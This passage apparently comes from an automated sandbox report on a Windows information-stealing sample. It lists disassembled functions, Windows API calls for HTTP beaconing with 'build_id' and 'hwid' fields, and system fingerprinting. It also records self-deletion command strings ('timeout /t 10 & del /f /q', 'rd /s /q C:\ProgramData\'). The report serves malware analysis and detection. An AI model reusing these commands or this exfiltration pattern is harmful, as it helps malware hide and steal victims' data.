                                                        • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL$NA
                                                        • API String ID: 2456697202-3278140455
                                                        • Opcode ID: 57e22eef17cdb36c3521a7d831a0ea79dee62d03e454469d39e73387ed2660aa
                                                        • Instruction ID: 4504e1de8f9c01e0112c70905c88fd612714e815eae5e275fad6979fe8dd9d4a
                                                        • Opcode Fuzzy Hash: 57e22eef17cdb36c3521a7d831a0ea79dee62d03e454469d39e73387ed2660aa
                                                        • Instruction Fuzzy Hash: DB4139B1A01228BBCB10DB95DC49EEFBB7CEF49750F104526F911E6290D7B89A41CBB4
                                                        Function 00403F90 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 445networkstringfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F34
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F3D
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F46
                                                          • Part of subcall function 00403F08: lstrlenA.KERNEL32(00000000,00000000,?,?,00421C30,ERROR), ref: 00403F60
                                                          • Part of subcall function 00403F08: InternetCrackUrlA.WININET(00000000,00000000,?,00421C30), ref: 00403F70
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040400A
                                                        • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00421EE4), ref: 00404022
                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404163
                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 0040419D
                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004041C4
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00414DF6,?,?,0041E266,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 004043FC
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00421EE4), ref: 00404415
                                                        • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00404429
                                                        • InternetReadFile.WININET(?,?,000007CF,00000000), ref: 00404476
                                                        • InternetCloseHandle.WININET(?), ref: 00404481
                                                        • InternetCloseHandle.WININET(?), ref: 00404492
                                                        • InternetCloseHandle.WININET(?), ref: 0040449B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                        • String ID: "$------$build_id$hwid
                                                        • API String ID: 3006978581-50533134
                                                        • Opcode ID: e3a68b4a28da2d903839ff47c07d969346a2ce879233266d0c48921b439e16d5
                                                        • Instruction ID: 9f2645046e1e14d45b332074011b0034978637058df6084b8b2e25c90fd9fcd4
                                                        • Opcode Fuzzy Hash: e3a68b4a28da2d903839ff47c07d969346a2ce879233266d0c48921b439e16d5
                                                        • Instruction Fuzzy Hash: 99F1BE72C00009AACB15EBE2DC92DEE777DAF24308F40493BF516B20D1EF396659CA94
                                                        Function 004108A3 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 299stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 004108CC
                                                        • StrCmpCA.SHLWAPI(00000000,true,?,?,?,00000104,?,00000104,?,?,00421EE4), ref: 00410966
                                                          • Part of subcall function 0040E603: lstrlenA.KERNEL32(?,0000000C,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E60C
                                                          • Part of subcall function 0040E603: lstrcpyA.KERNEL32(00000000,00000000,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E640
                                                        • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,?,?,?,00000104,?,00000104,?,?,00421EE4), ref: 00410A14
                                                        • lstrcpyA.KERNEL32(?,00000000,00000104,?,00000104,?,?,00421EE4), ref: 00410A4C
                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00421EE4), ref: 00410A8C
                                                        • lstrcpyA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00421EE4), ref: 00410ACC
                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00410B0C
                                                        • strtok_s.MSVCRT ref: 00410C47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$strtok_s$lstrlen
                                                        • String ID: false$true
                                                        • API String ID: 2116072422-2658103896
                                                        • Opcode ID: d755cf0b6370e0c55441f4f42a979346bb7082d146d5f982a43d4b20cee447f3
                                                        • Instruction ID: b7bf0eb779713947167ca4c0aacc2e07ad5dcef0ab7dfabf05fb8f5befb98f87
                                                        • Opcode Fuzzy Hash: d755cf0b6370e0c55441f4f42a979346bb7082d146d5f982a43d4b20cee447f3
                                                        • Instruction Fuzzy Hash: BCB174B2C04219ABDF24EBA1DC45EEE77BCEB14304F10097AF005E7192EB3996498F55
                                                        Function 004044FF Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F34
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F3D
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F46
                                                          • Part of subcall function 00403F08: lstrlenA.KERNEL32(00000000,00000000,?,?,00421C30,ERROR), ref: 00403F60
                                                          • Part of subcall function 00403F08: InternetCrackUrlA.WININET(00000000,00000000,?,00421C30), ref: 00403F70
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00421EE4), ref: 0040453A
                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00421EE4), ref: 00404541
                                                        • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404560
                                                        • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00421EE4), ref: 00404574
                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404598
                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 004045CE
                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004045F2
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004045FD
                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040461B
                                                        • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 0040466A
                                                        • InternetCloseHandle.WININET(00000000), ref: 0040469C
                                                        • InternetCloseHandle.WININET(?), ref: 004046A5
                                                        • InternetCloseHandle.WININET(?), ref: 004046AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                        • String ID: GET
                                                        • API String ID: 442264750-1805413626
                                                        • Opcode ID: f8f330915b68793308d37bfe540b4b34a6e3bca6beef39d09acd21ebb1a0b9dd
                                                        • Instruction ID: 31c954338610e9468dcfb905e6b60f7ad7b9c963431dab50f4bbdef06032ef0c
                                                        • Opcode Fuzzy Hash: f8f330915b68793308d37bfe540b4b34a6e3bca6beef39d09acd21ebb1a0b9dd
                                                        • Instruction Fuzzy Hash: FA517CB1901128BBCB10DFA1DD49AEF7BBDEF49741F000826F605B2191DB799A45CFA4
                                                        Function 00411B20 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00411B3B
                                                        • memset.MSVCRT ref: 00411B47
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,?), ref: 00411B5C
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00411C5B
                                                        • memset.MSVCRT ref: 00411C68
                                                        • memset.MSVCRT ref: 00411C76
                                                        • ExitProcess.KERNEL32 ref: 00411C87
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                        • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<$@C
                                                        • API String ID: 1943017432-3020992152
                                                        • Opcode ID: f41361a382e265a092895b58444d68fc1c09ad9ee3dc752a0b5ada264741590e
                                                        • Instruction ID: b1b0475ddf01fabefa46bf096056509a57643c130815acd1cf926bf9e32ff5fa
                                                        • Opcode Fuzzy Hash: f41361a382e265a092895b58444d68fc1c09ad9ee3dc752a0b5ada264741590e
                                                        • Instruction Fuzzy Hash: 53412FB1C0011CABCB10EBD2DC82DDEBB7CAF24304F50496BB516B2091EB386759CB99
                                                        Function 0041217A Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 629sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E603: lstrlenA.KERNEL32(?,0000000C,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E60C
                                                          • Part of subcall function 0040E603: lstrcpyA.KERNEL32(00000000,00000000,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E640
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004122B5
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412313
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 004116E3: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,ERROR,0041224B), ref: 00411724
                                                          • Part of subcall function 0041177B: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004117D7
                                                          • Part of subcall function 0041177B: lstrlenA.KERNEL32(00000000), ref: 004117EA
                                                          • Part of subcall function 0041177B: StrStrA.SHLWAPI(00000000,00000000), ref: 00411811
                                                          • Part of subcall function 0041177B: lstrlenA.KERNEL32(00000000), ref: 00411826
                                                          • Part of subcall function 0041177B: lstrlenA.KERNEL32(00000000), ref: 00411841
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004123ED
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041244B
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412525
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412583
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041265D
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004126BB
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412795
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004127ED
                                                        • Sleep.KERNEL32(0000EA60), ref: 004127FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$Sleep
                                                        • String ID: ERROR
                                                        • API String ID: 507064821-2861137601
                                                        • Opcode ID: b5be7514ae06d39bfa075ce17cf498f0764eabd312cb38b4156147d4426086fd
                                                        • Instruction ID: 43526a4cf6291767209d2c52cb83795b8448f16ba9ae9d20ac2e218fa080ad7d
                                                        • Opcode Fuzzy Hash: b5be7514ae06d39bfa075ce17cf498f0764eabd312cb38b4156147d4426086fd
                                                        • Instruction Fuzzy Hash: 21221271C00118AADB14F7B2DD5ADEE737CAF10308F40497FB516B20D2EE785A58CA69
                                                        Function 00414827 Relevance: 20.4, APIs: 4, Strings: 7, Instructions: 1135networksleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E603: lstrlenA.KERNEL32(?,0000000C,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E60C
                                                          • Part of subcall function 0040E603: lstrcpyA.KERNEL32(00000000,00000000,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E640
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040FE05: _EH_prolog.MSVCRT ref: 0040FE0A
                                                          • Part of subcall function 0040FE05: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040FE30
                                                          • Part of subcall function 0040FE05: Process32First.KERNEL32(00000000,00000128), ref: 0040FE40
                                                          • Part of subcall function 0040FE05: Process32Next.KERNEL32(00000000,00000128), ref: 0040FE52
                                                          • Part of subcall function 0040FE05: StrCmpCA.SHLWAPI(?,?), ref: 0040FE66
                                                          • Part of subcall function 0040FE05: CloseHandle.KERNEL32(00000000), ref: 0040FE77
                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0041E266,00000000), ref: 00414CAE
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00414D84
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00414DA1
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 0040F08A: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00421EE4), ref: 0040F0A7
                                                          • Part of subcall function 0040F08A: GetVolumeInformationA.KERNEL32(MA,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0040F0D9
                                                          • Part of subcall function 0040F08A: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040F11C
                                                          • Part of subcall function 0040F08A: HeapAlloc.KERNEL32(00000000), ref: 0040F123
                                                          • Part of subcall function 00403F90: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040400A
                                                          • Part of subcall function 00403F90: StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00421EE4), ref: 00404022
                                                          • Part of subcall function 00410C6A: StrCmpCA.SHLWAPI(00000000,block,?,?,00414DFE), ref: 00410C85
                                                          • Part of subcall function 00410C6A: ExitProcess.KERNEL32 ref: 00410C90
                                                          • Part of subcall function 00405AF9: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405B73
                                                          • Part of subcall function 00405AF9: StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00421EE4), ref: 00405B8B
                                                          • Part of subcall function 004107D2: strtok_s.MSVCRT ref: 004107F3
                                                          • Part of subcall function 004107D2: StrCmpCA.SHLWAPI(00000000,00421B68,?,?,?,?,00414F90), ref: 00410824
                                                          • Part of subcall function 004107D2: strtok_s.MSVCRT ref: 00410885
                                                          • Part of subcall function 00405AF9: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405CCC
                                                          • Part of subcall function 00405AF9: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405D06
                                                          • Part of subcall function 00405AF9: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405D2D
                                                          • Part of subcall function 00410487: strtok_s.MSVCRT ref: 004104A8
                                                          • Part of subcall function 00410487: strtok_s.MSVCRT ref: 0041052D
                                                        • Sleep.KERNEL32(000003E8), ref: 00415130
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$Openlstrcpy$strtok_s$CreateDirectoryHeapProcessProcess32lstrlen$AllocCloseConnectExitFirstH_prologHandleHttpInformationNextOptionRequestSleepSnapshotToolhelp32VolumeWindowslstrcat
                                                        • String ID: .exe$1$_DEBUG.zip$com$http://$stadia$technologies
                                                        • API String ID: 4092323695-3509383634
                                                        • Opcode ID: 5303613ea3ff93ba746f28d713c158d028385f1ec6528411343d544526bc52c8
                                                        • Instruction ID: 4aa014a44fefe50048bd1790233590da7f9d1a64e9cea90dc0e761711f73dde1
                                                        • Opcode Fuzzy Hash: 5303613ea3ff93ba746f28d713c158d028385f1ec6528411343d544526bc52c8
                                                        • Instruction Fuzzy Hash: 9D922E71D00119AACB14FBA2DC52DEE7779AF20308F80097BF506721D2EF395B59CA99
                                                        Function 0040F08A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 113memorystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00421EE4), ref: 0040F0A7
                                                        • GetVolumeInformationA.KERNEL32(MA,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0040F0D9
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040F11C
